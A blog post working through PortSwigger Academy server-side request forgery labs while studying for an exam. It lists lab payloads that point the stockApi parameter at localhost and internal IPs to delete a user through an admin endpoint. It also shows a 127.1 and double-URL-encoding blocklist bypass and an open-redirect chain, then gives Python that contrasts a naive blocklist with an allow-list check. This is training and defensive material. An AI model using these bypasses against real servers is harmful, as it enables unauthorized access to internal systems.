PortSwigger Academy - Server Side Request Forgery

  • Writer: Avraham Cohen
  • Jul 26, 2021
  • 1 min read

Studying for my eLearnSecurity eWPTX exam, I decided to solve the Server Side Request Forgery labs from PortSwigger Academy. I must say that these labs are not easy and you can gain a lot of knowledge. Don't jump to the solution; try for yourself, and if you are not able to get it in a few hours, then reverse engineer the payload.


Here is a list of the labs from Apprentice to Practitioner level:

You can find the lab list at the following link


Research: Intercept the request for the stock page and observe a call to stockAPI.

Change it to http://localhost/admin/delete?user=carlos and view the response; it states that the parameter username is missing.


Research: Intercept the request for the stock page and observe a call to stockAPI. Send the request to Intruder and search for the response that states that the parameter username is missing.

Payload: stockApi=http://192.168.0.7:8080/admin/delete?username=carlos


Research: Following the previous lab, we can see that a call to localhost is being blocked.

I had to look at the results to understand what type of obfuscation they used (double URL encoding).

Payload: http://127.1/%2561dmin/delete?username=carlos


Research: Intercept the request for the stock page and observe a call to stockAPI. Send the request to Intruder and check whether it is possible to change the redirect. Keep researching the different requests: the Next Product request contains the path parameter, /product/nextProduct?currentProductId=4&path=/product?productId=5. Take this value and change the path to /product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos

Payload: stockApi=/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos
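The three tricks these labs rely on (the stockApi parameter pointing at localhost, the 127.1 / double-URL-encoded bypass of a blocklist, and an open redirect that forwards a relative path to an internal host) all defeat the same kind of defence: a blocklist applied to the raw string. The following Python is an added example written for this post, not code from PortSwigger or the lab application, showing a naive blocklist beside an allow-list check that canonicalises the URL first. The allow-listed host stock.example and the function names are assumptions chosen for the example; the sample URLs are the payloads quoted in this post.

```python
import ipaddress
import socket
from urllib.parse import urlsplit, unquote

# Constructed allow-list: the only upstream the stock checker may talk to.
ALLOWED_HOSTS = {"stock.example"}


def naive_blocklist_allows(url: str) -> bool:
    """The weak check the labs bypass: substring matching on the raw URL.

    Returns True when the URL would be let through.
    """
    for bad in ("localhost", "127.0.0.1", "/admin"):
        if bad in url:
            return False
    return True


def fully_decode(value: str, rounds: int = 5) -> str:
    """Percent-decode until the string stops changing, so that a doubly
    encoded %2561dmin becomes /admin the way the lab's backend saw it."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def canonical_host(host: str) -> str:
    """Normalise shorthand IPv4 literals such as 127.1 to dotted quads.

    inet_aton accepts the same abbreviated forms as most HTTP clients, so
    the comparison below sees the address the request would really hit.
    Hostnames that are not IP literals are just lower-cased.
    """
    try:
        packed = socket.inet_aton(host)
    except OSError:
        return host.lower()
    return str(ipaddress.IPv4Address(packed))


def is_allowed_stock_url(url: str) -> bool:
    """Allow-list check: decode, parse, canonicalise, then compare hosts."""
    parts = urlsplit(fully_decode(url))
    # A relative path (the open-redirect payload) has no scheme or host.
    if parts.scheme not in ("http", "https") or not parts.hostname:
        return False
    # Reject user@host tricks and unexpected ports outright.
    if parts.username is not None or parts.port not in (None, 80, 443):
        return False
    host = canonical_host(parts.hostname)
    # Any IP literal is rejected even before the allow-list: the upstream
    # is addressed by name, so a literal is never legitimate here.
    try:
        ipaddress.ip_address(host)
        return False
    except ValueError:
        pass
    return host in ALLOWED_HOSTS


if __name__ == "__main__":
    # Constructed inputs: the payloads from this post plus one legitimate URL.
    samples = [
        "http://localhost/admin/delete?username=carlos",
        "http://127.1/%2561dmin/delete?username=carlos",
        "/product/nextProduct?path=http://192.168.0.12:8080/admin/delete?username=carlos",
        "http://stock.example/check?productId=1",
    ]
    for s in samples:
        print(f"{s}\n  blocklist lets through: {naive_blocklist_allows(s)}"
              f"\n  allow-list accepts:     {is_allowed_stock_url(s)}")
```

The blocklist lets the 127.1 payload through because neither "127.0.0.1" nor "/admin" appears in the raw string, which is exactly the bypass the third lab teaches; the allow-list version rejects it after decoding and canonicalising. In a real deployment the check must also be repeated on every redirect hop and the resolved IP address should be validated at connection time, otherwise a DNS name on the allow-list that later resolves to an internal address would still reach it.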


I don't have a Burp Suite license, so I can't get access to Burp Collaborator.
